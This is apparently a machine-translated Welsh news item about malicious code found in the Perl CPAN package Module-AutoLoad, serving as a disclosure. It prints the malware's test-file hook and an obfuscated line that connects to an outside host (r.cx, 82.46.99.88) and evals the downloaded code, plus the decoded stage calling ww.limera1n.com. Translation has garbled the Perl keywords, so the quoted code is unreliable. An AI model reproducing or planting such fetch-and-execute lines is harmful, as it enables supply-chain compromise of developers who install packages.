ProHoster > blog > newyddion rhyngrwyd > Cod maleisus wedi'i ganfod yn y pecyn Modiwl-AutoLoad Perl

Cod maleisus wedi'i ganfod yn y pecyn Modiwl-AutoLoad Perl

Mewn pecyn Perl a ddosberthir trwy'r cyfeiriadur CPAN Modiwl-AwtoLlwyth, wedi'i gynllunio i lwytho modiwlau CPAN yn awtomatig ar y hedfan, wedi'i nodi cod maleisus. Roedd y mewnosodiad maleisus dod o hyd yn y cod prawf 05_rcx.t, sydd wedi bod yn cludo ers 2011.
Mae'n werth nodi bod cwestiynau am lwytho cod amheus wedi codi Gorlif pentwr yn ôl yn 2016.

Mae gweithgaredd maleisus yn deillio o ymgais i lawrlwytho a gweithredu cod o weinydd trydydd parti (http://r.cx:1/) yn ystod gweithrediad cyfres brawf a lansiwyd wrth osod y modiwl. Tybir nad oedd y cod a lawrlwythwyd i ddechrau o'r gweinydd allanol yn faleisus, ond nawr mae'r cais yn cael ei ailgyfeirio i'r parth ww.limera1n.com, sy'n darparu ei ran o'r cod ar gyfer gweithredu.

I drefnu'r lawrlwythiad mewn ffeil 05_rcx.t Defnyddir y cod canlynol:

fy $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
fy $try = `$^X $prog`;

Mae'r cod penodedig yn achosi i'r sgript gael ei gweithredu ../contrib/RCX.pl, y mae eu cynnwys yn cael eu lleihau i'r llinell:

defnyddio lib do{eval<$b>&&botstrap("RCX")if$b=IO newydd::Soced::INET 82.46.99.88.":1″};

Mae'r sgript hon yn llwytho drysu defnyddio'r gwasanaeth perlobfuscator.com cod o'r gwesteiwr allanol r.cx (mae codau cymeriad 82.46.99.88 yn cyfateb i'r testun "R.cX") ac yn ei weithredu yn y bloc eval.

$ perl -MIO::Soced -e'$b= IO newydd::Soced::INET 82.46.99.88.":1 ″; argraffu <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Ar ôl dadbacio, gweithredir y canlynol yn y pen draw: код:

print{$b=IO newydd::Soced::INET"ww.limera1n.com:80 ″}" GAEL /iJailBreak
"; dychweliad elor rhybuddio$@ tra$b;1

Mae'r pecyn problemus bellach wedi'i dynnu o'r gadwrfa. OEDIAD (Gweinydd Uwchlwytho Perl Authors), ac mae cyfrif awdur y modiwl wedi'i rwystro. Yn yr achos hwn, mae'r modiwl yn dal i fod ar gael yn archif MetaCPAN a gellir ei osod yn uniongyrchol o MetaCPAN gan ddefnyddio rhai cyfleustodau fel cpanminus. Nodirnad oedd y pecyn wedi'i ddosbarthu'n eang.

Diddorol trafod cysylltiedig ac awdur y modiwl, a wadodd y wybodaeth bod cod maleisus wedi'i fewnosod ar ôl i'w wefan “r.cx” gael ei hacio ac esbonio ei fod yn cael hwyl, a defnyddiodd perlobfuscator.com i beidio â chuddio rhywbeth, ond i leihau'r maint o'r cod a symleiddio ei gopïo trwy'r clipfwrdd. Eglurir y dewis o enw swyddogaeth “botstrap” gan y ffaith bod y gair hwn “yn swnio fel bot ac yn fyrrach na bootstrap.” Sicrhaodd awdur y modiwl hefyd nad yw'r triniaethau a nodwyd yn cyflawni gweithredoedd maleisus, ond dim ond yn dangos llwytho a gweithredu cod trwy TCP.

Ffynhonnell: opennet.ru

Ychwanegu sylw